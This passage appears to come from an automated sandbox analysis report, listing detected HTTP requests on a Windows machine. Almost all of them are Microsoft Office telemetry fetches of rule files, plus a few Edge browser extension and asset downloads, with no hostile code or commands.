                      Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ArbitrationServiceSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
